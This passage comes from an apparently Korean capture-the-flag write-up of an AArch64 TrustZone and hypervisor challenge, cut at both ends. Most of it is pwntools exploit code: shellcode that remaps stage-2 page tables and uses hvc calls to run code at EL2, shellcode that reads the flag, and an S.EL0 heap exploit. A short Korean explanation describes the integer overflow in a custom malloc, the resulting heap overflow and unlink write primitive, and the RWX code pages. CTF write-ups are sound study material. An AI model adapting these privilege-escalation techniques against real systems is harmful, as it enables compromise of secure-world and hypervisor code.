</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x22, x22, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x22, x23;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_rop_chain </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span>, <span style="color:#75715e"># this mmap allocate NEW_MAP_ADDR(0x7ffeffffb000)-0x36000</span> </span></span><span style="display:flex;"><span> head_input<span style="color:#f92672">=</span>make_shellcode(assembly) <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span>, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el2_arbitrary_code_execute</span>(assembly_or_shellcode: str <span style="color:#f92672">|</span> bytes) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> EL1_GET_CHAR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0009AD8</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> isinstance(assembly_or_shellcode, str): </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> make_shellcode(assembly_or_shellcode) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">else</span>: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> assembly_or_shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode <span style="color:#f92672">and</span> len(shellcode) <span style="color:#f92672">&lt;</span> (<span style="color:#ae81ff">0x1000</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">0xC</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> VA <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0002000</span> </span></span><span style="display:flex;"><span> EL2_RWX <span style="color:#f92672">=</span> VA <span style="color:#f92672">+</span> <span style="color:#ae81ff">0xC</span> </span></span><span style="display:flex;"><span> EL1_DESCRIPTOR_TABLE_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC001E010</span> </span></span><span style="display:flex;"><span> EL1_DESCRIPTOR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x2443</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> TARGET_IPA_DESCRIPTOR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x40102000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x443</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x80</span> </span></span><span style="display:flex;"><span> IPA_DESCRIPTOR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x100000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x443</span> </span></span><span style="display:flex;"><span> IPA <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x2000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x80</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> TARGET_IPA_DESCRIPTOR <span style="color:#f92672">==</span> ((IPA <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x40000000</span>) <span style="color:#f92672">|</span> IPA_DESCRIPTOR) </span></span><span style="display:flex;"><span> el1_arbitrary_code_execute( </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x0, =</span><span style="color:#e6db74">{</span>hex(EL1_DESCRIPTOR_TABLE_ADDR)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x1, #</span><span style="color:#e6db74">{</span>hex(EL1_DESCRIPTOR)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str x1, [x0];</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, #1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(IPA)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x2, =</span><span style="color:#e6db74">{</span>hex(IPA_DESCRIPTOR)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> hvc 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x20, =</span><span style="color:#e6db74">{</span>hex(EL2_RWX)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x21, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x22, #</span><span style="color:#e6db74">{</span>len(shellcode)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> read_el2_shellcode: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x0, =</span><span style="color:#e6db74">{</span>hex(EL1_GET_CHAR)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> strb w0, [x20, x21];</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x21, x21, 1</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x21, x22</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_el2_shellcode;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, #1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x1, #2;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, #3;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> hvc 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(shellcode) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_print_flag_shellcode</span>( </span></span><span style="display:flex;"><span> print_function: int, buf: int <span style="color:#f92672">|</span> str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sp&#34;</span> </span></span><span style="display:flex;"><span>) <span style="color:#f92672">-&gt;</span> str: </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> isinstance(buf, int): </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;ldr x0, =</span><span style="color:#e6db74">{</span>hex(buf)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">else</span>: </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;mov x0, </span><span style="color:#e6db74">{</span>buf<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">+=</span> make_shellcode(assem) </span></span><span style="display:flex;"><span> GET_FLAG <span style="color:#f92672">=</span> [ </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFC01</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9000001</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFC21</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9000401</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFC41</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9000801</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFC61</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9000C01</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFC81</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9001001</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFCA1</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9001401</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFCC1</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9001801</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD53BFCE1</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xB9001C01</span>, </span></span><span style="display:flex;"><span> ] </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> GET_FLAG: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">+=</span> p32(x) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>hex(print_function)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> nop;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">+=</span> make_shellcode(assem) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run.sh&#34;)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run_debug.sh&#34;)</span> </span></span><span style="display:flex;"><span>el0_elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL2_PRINT_FUNCTION <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x40101020</span> </span></span><span style="display:flex;"><span>el2_arbitrary_code_execute(make_print_flag_shellcode(EL2_PRINT_FUNCTION)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline() </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Flag: </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span></code></pre></div><h3 id="sel0">S.EL0</h3> <p>취약점은 save_key 의 custom malloc 에 존재한다.<br> malloc 의 인자로 받는 size 의 align 을 맞추는 과정에서 size 에 더하기를 수행하지만, 그 결과를 검증하지 않아서 Integer Overflow 가 발생할 수 있다. 그러면 메모리 할당 후에 memcpy 를 하는 과정에서 Heap Overflow 가 발생할 수 있다.<br> 이 때 Data Abort 가 발생해도 아무런 문제가 발생하지 않기 때문에 편하게 익스를 할 수 있다.</p> <p>custom heap 도 free_list 를 가지고 있고 fd 를 통해 freed chunk 를 연결하므로 Heap Overflow 를 통해 free_list 를 변조할 수 있다. 그리고 unlink 를 통해 4byte aaw 가 가능하다.</p> <p>그리고 위에서 보면 알 수 있듯 SEL0 의 Code 영역은 RWX 권한이다. 따라서 코드 영역을 변조하면 Arbitrary Code Execute 를 할 수 있다.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>DUMMY_VALUE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xDEAD_BEEF_CAFE_BEBE</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_STACK_LOW <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_E000</span> </span></span><span style="display:flex;"><span>EL0_SFP_IN_RUN <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_FFA0</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_D000</span> </span></span><span style="display:flex;"><span>EL0_WSM <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_E000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_00FC</span> </span></span><span style="display:flex;"><span>EL0_LDR_X19_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0294</span> </span></span><span style="display:flex;"><span>EL0_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0100</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_32_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;arm&#34;</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">32</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_thumb_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;thumb&#34;</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">32</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_64_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span> context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el0_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x120</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> make_64_shellcode(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> len(pl) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x1000</span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">0x100</span> <span style="color:#f92672">-</span> len(pl)) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>] <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x44</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;mprotect&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">0x1000</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> load_key(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_RET) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(DUMMY_VALUE) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_SFP_IN_RUN <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x30</span>) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> p64(EL0_STACK_LOW <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_BUF <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x120</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sel0_arbitrary_code_execute</span>( </span></span><span style="display:flex;"><span> sel0_assem: str <span style="color:#f92672">|</span> bytes, el0_assem: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span>) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> SEL_WSM_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x2400000</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x2000</span> </span></span><span style="display:flex;"><span> TCI_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFEFFFFE000</span> </span></span><span style="display:flex;"><span> TCI_HANDLE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x23FE000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">tc_tci_call</span>(cmd: int, index: int, size: int, data: bytes) <span style="color:#f92672">-&gt;</span> str: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> data </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x1, #</span><span style="color:#e6db74">{</span>hex(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;gets&#39;</span>] <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movk x1, #</span><span style="color:#e6db74">{</span>hex((elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;gets&#39;</span>] <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">16</span>) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">, LSL #16;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x0, x28, #0x0C;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x0, #</span><span style="color:#e6db74">{</span>hex(cmd)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str w0, [x28, #0];</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x0, #</span><span style="color:#e6db74">{</span>hex(index)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str w0, [x28, #4];</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x0, #</span><span style="color:#e6db74">{</span>hex(size<span style="color:#f92672">&amp;</span><span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span 